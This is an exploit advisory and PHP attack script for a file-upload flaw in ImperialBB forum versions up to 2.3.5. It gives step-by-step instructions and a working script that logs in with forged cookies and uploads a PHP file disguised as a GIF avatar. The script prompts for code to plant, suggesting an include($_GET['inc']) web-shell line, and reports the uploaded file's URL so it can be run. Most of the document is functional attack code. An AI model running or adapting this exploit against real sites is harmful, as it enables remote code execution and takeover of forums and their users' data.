# Title : ImperialBB <= 2.3.5 Remote File Upload Exploit
# Published : 2008-07-05
# Author : PHPLizardo
Title : ImperialBB <= 2.3.5 Remote File Upload Vulnerability
Date : 5th July 2008
Found by : PHPLizardo - http://phplizardo.2gb.fr
Greetz : Gu1ll4um3r0m41n
Howto : 1. Log in with an ordinary forum account and go to your User Control Panel (the upload is reachable only by an authenticated user; the exploit below authenticates with the UserName/Password cookie pair)
2. Upload any file you want
3. Intercept the upload request and change the Content-Type of the file part to: image/gif. The affected versions check only this client-supplied MIME type, so the original filename and its extension (e.g. .php) are kept when the file is written to disk.
4. There is your file : http://site.com/[forum_path]/images/avatars/uploads/[your_nickname]_[filename].[ext]
<?php
/*
Title : ImperialBB <= 2.3.5 Remote Upload Vulnerability
Date : 5th July 2008
Found by : PHPLizardo
Description : This vulnerability can be used by an attacker (any registered user) to upload a malicious script, such as a PHP file, into the web-accessible avatar upload directory of the forum.
Greetz : irc.worldnet.net #carib0u
*/
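/**
 * Build one ordinary (non-file) multipart/form-data part, CRLF-terminated.
 *
 * @param string $boundary multipart boundary (without the leading "--")
 * @param string $name     form field name
 * @param string $value    field value; '' reproduces the blank fields the
 *                         profile form posts (OldPass, PassWord, signature, ...)
 */
function mp_field($boundary, $name, $value = '')
{
    return "--{$boundary}\r\n"
        . "Content-Disposition: form-data; name=\"{$name}\"\r\n\r\n"
        . "{$value}\r\n";
}

/**
 * Build the file part of the multipart body.
 *
 * The Content-Type is the attacker-controlled value the vulnerable forum
 * trusts (image/gif), while the filename keeps its .php extension — that
 * mismatch is the whole vulnerability.
 *
 * @param string $boundary multipart boundary (without the leading "--")
 * @param string $name     form field name of the file input
 * @param string $filename filename sent to the server
 * @param string $mime     Content-Type claimed for the part
 * @param string $data     file contents
 */
function mp_file($boundary, $name, $filename, $mime, $data)
{
    return "--{$boundary}\r\n"
        . "Content-Disposition: form-data; name=\"{$name}\"; filename=\"{$filename}\"\r\n"
        . "Content-Type: {$mime}\r\n\r\n"
        . "{$data}\r\n";
}

// One banner for both the usage and the run path (the original had two
// slightly different copies, one with a stray '.' in the border).
$banner = "\n\n"
    . "+---------------------------------------------------------------+\r\n"
    . "| ImperialBB <= 2.3.5 Remote Upload Vulnerability               |\r\n"
    . "| By PHPLizardo - irc.worldnet.net #carib0u                     |\r\n"
    . "| Usage: php exploit.php site.com /path/ user pass [port]       |\r\n"
    . "+---------------------------------------------------------------+\r\n";

// Usage: host, forum path, forum username, forum password, optional port
// (defaults to 80, which the original hard-coded).
$argCount = count($argv);
if ($argCount !== 5 && $argCount !== 6) {
    echo $banner, "\n\n";
    exit(1);
}

$host = $argv[1];
$user = $argv[3];
$pass = $argv[4];
$port = $argCount === 6 ? (int) $argv[5] : 80;

// Normalise the forum path so "/forum", "/forum/" and "forum/" all work.
// The original required a trailing slash for the POST and then produced a
// double slash ("/path//images/...") in the reported URL.
$base = '/' . trim($argv[2], '/');
if ($base === '/') {
    $base = '';
}

echo $banner, "\n";
// The placeholder is a literal example: \$ keeps PHP from trying to
// interpolate $_GET['inc'] (which is a parse error in a double-quoted string).
echo "Code to write in the file (ie. <?php include(\$_GET['inc']); ?>) :\r\n\n";
$line = fgets(STDIN);
if ($line === false) {
    fwrite(STDERR, "No payload read from STDIN. Operation aborted.\n");
    exit(1);
}
$code = trim($line);

$errno = 0;
$errstr = '';
$socket = fsockopen($host, $port, $errno, $errstr, 30);
if ($socket === false) {
    fwrite(STDERR, "Could not connect to {$host}:{$port} ({$errstr}). Operation aborted.\n");
    exit(1);
}

// Fixed boundary taken from the original request; body delimiters are
// "--" . boundary, the closing one "--" . boundary . "--".
$boundary = '---------------------------200831142015814';
$filename = 'funypicture.php';

// Field order and values mirror the profile "edit" form as submitted by the
// original exploit, including the blank password fields and the second
// (duplicate) OldPass field after email_on_pm.
$body = '';
$before = [
    ['Email', 'test@test.test'],
    ['Email2', 'test@test.test'],
    ['OldPass'],
    ['PassWord'],
    ['Pass2'],
    ['signature'],
    ['aim'],
    ['icq'],
    ['msn'],
    ['yahoo'],
    ['Remote_Avatar_URL'],
];
foreach ($before as $field) {
    $body .= mp_field($boundary, $field[0], isset($field[1]) ? $field[1] : '');
}
$body .= mp_file($boundary, 'Upload_Avatar', $filename, 'image/gif', $code);
$after = [
    ['month', '00'],
    ['day', '00'],
    ['year', '0000'],
    ['website'],
    ['location'],
    ['email_on_pm', '0'],
    ['OldPass'],
    ['Submit', 'Submit'],
];
foreach ($after as $field) {
    $body .= mp_field($boundary, $field[0], isset($field[1]) ? $field[1] : '');
}
$body .= "--{$boundary}--\r\n";

// Authentication is cookie-based: UserName plus md5(md5(password)). This is
// the login-cookie format the original exploit relied on for 2.3.5 — confirm
// against the target's login code if the request is rejected.
// NOTE(review): the username is placed in the cookie unencoded, as in the
// original; names with ';', spaces or non-ASCII may need encoding.
$hostHeader = $port === 80 ? $host : "{$host}:{$port}";
$headers = "POST {$base}/profile.php?func=edit HTTP/1.1\r\n"
    . "Host: {$hostHeader}\r\n"
    . "Accept: */*\r\n"
    . "Connection: Close\r\n"
    . "Cookie: UserName={$user}; Password=" . md5(md5($pass)) . "\r\n"
    . "Content-Type: multipart/form-data; boundary={$boundary}\r\n"
    // strlen() is intentional: Content-Length is a byte count.
    . "Content-Length: " . strlen($body) . "\r\n\r\n";

$request = $headers . $body;
$written = fwrite($socket, $request);
if ($written === false || $written < strlen($request)) {
    fclose($socket);
    fwrite(STDERR, "Failed to send the full request to {$host}. Operation aborted.\n");
    exit(1);
}

// The original never read the reply (hence "It might have worked"); read it
// so the status line can be reported, and release the socket afterwards.
$response = '';
while (!feof($socket)) {
    $chunk = fread($socket, 8192);
    if ($chunk === false || $chunk === '') {
        break;
    }
    $response .= $chunk;
}
fclose($socket);

$eol = strpos($response, "\r\n");
$statusLine = $eol === false ? trim($response) : substr($response, 0, $eol);
echo "Server answered: ", ($statusLine === '' ? '(no response)' : $statusLine), "\n";

// Upload location as documented in the advisory:
// [forum_path]/images/avatars/uploads/[nickname]_[filename].[ext]
echo "It might have worked, check if your file is online at -> http://"
    . $hostHeader . $base . "/images/avatars/uploads/" . $user . "_" . $filename . "\n";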
?>